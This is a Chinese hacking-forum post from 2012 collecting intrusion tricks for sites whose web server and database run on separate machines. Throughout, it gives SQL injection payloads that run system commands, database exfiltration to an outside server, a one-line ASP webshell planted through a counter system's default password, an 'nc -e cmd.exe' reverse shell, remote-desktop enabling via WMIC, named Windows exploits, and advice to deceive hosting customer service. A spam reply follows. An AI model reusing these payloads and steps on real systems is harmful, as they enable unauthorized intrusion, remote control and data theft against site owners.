找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3438|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关& X/ Q; [- J) j# O( c& Y3 y

/ E2 ]# y' S* `# y9 ?. m
. E) g0 ?  p" ASA点数据库分离搞法+语句:+ q* V# M; L6 N  Q* a' y$ c# S
$ @' M2 B2 i' y1 N
注射点不显错,执行下面三条语句页面都返回正常。
4 p) q) E+ A1 j0 ^5 zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')( K7 W3 r* u, _3 {; m
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')0 l8 h! k5 X4 A0 Z2 O0 R% y) K
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
/ |' ]2 y" J! R! i/ A" v( ]+ A可以列目录,判断系统为2000,web与数据库分离
" @& I$ h3 n" W2 N. i! F# f! x# j遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
/ F7 I3 z+ Y9 r) B/ o在注射点上执行
% ^* U1 }- x& ?8 D9 h6 |" R* S) Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
; V+ u( w* L4 l. v  V6 [1 C* g页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP. ?* Y8 \' ?# Y$ O9 p; I
还有我用NC监听得其他端口都没有得到IP。
& Q5 B! O" u- p3 z/ \% p1 ^$ Z/ |) G* ?- v2 W8 a3 j
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
; {% `3 l5 f% Z% {+ @6 \' v'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--. V+ U8 P9 X! {- A  I6 J. y

- i% X8 u6 P! Y8 [  O;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--2 D+ Y% y7 s2 A" P+ j; J) g$ q* R# Z/ i

# r! }, q( Y" N0 F6 S; G0 n现在就猜想是不是数据库是内网而且不能连外网。& ?2 Q3 {# w$ w; B9 z# I

& X, U* J" ^4 y3 R% e4 t; Z+ X0 I& R' D4 ~
access导出txt文本代码
& s# W* ?. U: R# aSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
  M; ]6 Q% m5 A" I' T4 e" V: ?  T( T5 H) k% S  U2 [: m: S
. C% f  J& k  ?: x
$ E" o1 D3 L$ N+ x
自动跳转到指定网站代码头6 j8 w8 Z& z6 D
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
2 ]. q0 C* J7 k; s9 |# x0 d' h* k" U; }. G
' ^8 u: {. N7 Y2 |5 Y
入侵java or jsp站点时默认配置文件路径:
  w: V# T) b* x' p& a: P\web-inf\web.xml, b, [- G( A& L3 m0 r: x* f
tomcat下的配置文件位置:8 u; J0 E! Y1 s  g) H. u5 p2 U
\conf\server.xml            (前面加上tomcat路径)
9 l6 R  E. g( {2 t3 c\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
/ R, Y% J+ x* Y  l4 w- |8 Y  _, w( d0 K' g* \+ s' \- ?  T+ {' `! X1 s

0 C. Q) H$ ]' I( x. T7 u* T' U% V, N$ I5 o
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
) z9 A0 g7 {. p-1%23
7 f# i7 z2 X8 f2 O+ k5 W* Q, B> , G$ r+ ^( ]/ N0 [5 E
<
- a6 o" u) P# X/ Q; F4 L1'+or+'1'='1  Z9 G2 W  |  d  [0 u6 Z
id=8%bf1 C# W$ e' R7 f9 @/ a: L+ H

, w( N, @1 l7 T% D* ?3 S4 a! W7 l全新注入点检测试法:- c4 q; n9 F1 ]% ?! \
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。- v) x# e( C  Z
* |! r; T* `9 ?  T
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。2 R  @1 L1 D0 R+ O0 t( z

; X1 `8 y* h$ R搜索型注入判断方法:( j1 g( M3 q. s. W$ l7 ?2 N6 l9 C
北京%' and '1'='1' and '%'='
6 W3 e$ n$ k! f) ^8 L北京%' and '1'='2' and '%'='/ s* y7 [. h7 q6 W+ I0 l

, s& w/ k1 n% d3 @! x3 K6 b/ S. t0 j3 [! y' W- p- p
COOKIES注入:
8 G* ~/ ]0 b4 E8 c% r
5 Z0 W3 V% o0 t2 B- [* ~9 Njavascript:alert(document.cookie="id="+escape("51 and 1=1"));
3 _/ N. N+ ]( f2 r8 P  [
6 m$ _8 ^! j$ I( I2000专业版查看本地登录用户命令:  D7 u$ o) N, w0 n' G# ?
net config workstation. M% x% [1 e9 i5 E% Z
# G0 ]3 p2 _+ M

! _6 u3 _& {  G4 c  e2003下查看ipsec配置和默认防火墙配置命令:
! ?8 U4 e" v' Vnetsh firewall show config: V9 Y5 h0 f; c  z) H8 f! O
netsh ipsec static show all
0 f& a: M7 Q* H: l* C% f8 k  l9 w/ [8 u4 U
不指派指定策略命令:$ r4 T5 a2 ?) I
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
1 f" D: G% n$ `, t. qnetsh ipsec static show policy all  显示策略名, F7 c$ ^' q- p( a1 S; }! t3 V' p
1 k7 A8 d: r! N: b  _6 k5 N; o% U$ l
1 r9 j/ @( ^) ]5 V) U
猜管理员后台小技巧:
* d/ l& f3 g; d2 ladmin/left.asp
) w1 c1 ?" ?) D! D7 Eadmin/main.asp7 s  W  o( K  ?
admin/top.asp# {8 ?3 Y# v' ?# H
admin/admin.asp
1 ?: F' s* b/ c; F会现出菜单导航,然后迅雷下载全部链接( l; `5 o5 R6 k$ o7 Y/ `( M1 B4 |) x
6 a, g: K, W  ?7 ^, y/ Y3 A# W4 s

2 Z5 |. U$ `" |4 B: M$ o6 C4 ~! c6 f) p社会工程学:2 Z, Z6 q: ?1 I/ M0 K
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人+ m1 h9 `$ q' E1 U  C2 i
然后去骗客服. q0 o7 l0 [3 |, B3 U; M5 h/ i
  ~. e/ A: u4 G% ?( l( B% e) p
) g+ x$ h3 U6 v& `* E
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 l. j0 z" Q3 l3 k+ B" b) Z
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
4 ?3 g- `- w) m7 T2 ~+ T" P. s  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。" y# y% y7 O6 E
$ s9 U, E0 [# `! P& w; R0 Q
7 e% Z7 X" A. f. p

5 K# K+ N* p5 ^* G4 W) h- M6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)7 h/ M7 S; R1 d7 V+ O$ j. D  `

1 O9 A1 U" F+ t
9 u" l6 j( b/ g; F# q! X
7 r3 \4 O3 ^2 Y8 RCMD加密注册表位置
( O4 x& U' Y4 D- d! f0 f- m(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor  C  L: a: k& C, T# o6 ]
AutoRun2 v  F+ n' l' l1 E7 U
# M0 ?3 b2 L* r, p4 f
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
! X( u, H) S+ f7 F4 U" SAutoRun
" `, j& D; _4 ]" n3 ^. m3 R
9 w: i2 W1 V7 {# O1 o6 S' s
- T, X; d6 g% r/ c% G" m在找注入时搜索Hidden,把他改成test! e% E2 @0 Y, Q3 M! N# ^

! `& s$ _( |  X- @  V" j" }/ T6 N/ I9 j& i3 W( x" F* U
  _2 Z9 N! p( O& z0 |# h
mstsc /v:IP /console
1 c6 P% n, A8 x. L; d7 l; H; X4 h, r9 R# X: k
2 P0 [" s1 R5 }" ~
一句话开3389:+ Y( J/ }# x+ R* J6 H
6 a: B/ W0 v- m* z* m
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  * m' P' }: f! ~3 B! s  A
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
# {- k- r: @6 ]9 Y
% t* u  k7 H0 y1 b; A1 m) v5 y. S; l5 k) Y" u8 a% x( T0 ^+ D+ Y
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
# ]6 k3 ]( v7 `0 xInsert into admin(user,pwd) values('test','test')( D0 L) X( x  `; v# ^: k

  @% a6 m! d! N' U7 T7 }) W% g; i; o; t5 D. B) j# x4 a
NC反弹. O( z: ~+ F+ L1 v4 K
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
8 E9 [8 C3 L; @7 U9 l然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行): x0 U! R/ y' X, U9 K8 X8 w

. a+ r% b0 w* a/ a0 C
. J! e7 V3 e3 z8 P8 ~5 `在脚本入侵过程中要经常常试用%00来确认下参数是否有问题! _& @! E7 T' r: j  G4 s
/ A3 j# C  G) a
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
; Q0 T! a- K+ e; [' {, h) Q例如:
. K8 z# c, k; t6 C3 Q' Rsubst k: d:\www\ 用d盘www目录替代k盘, q) Q( w& o3 e
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表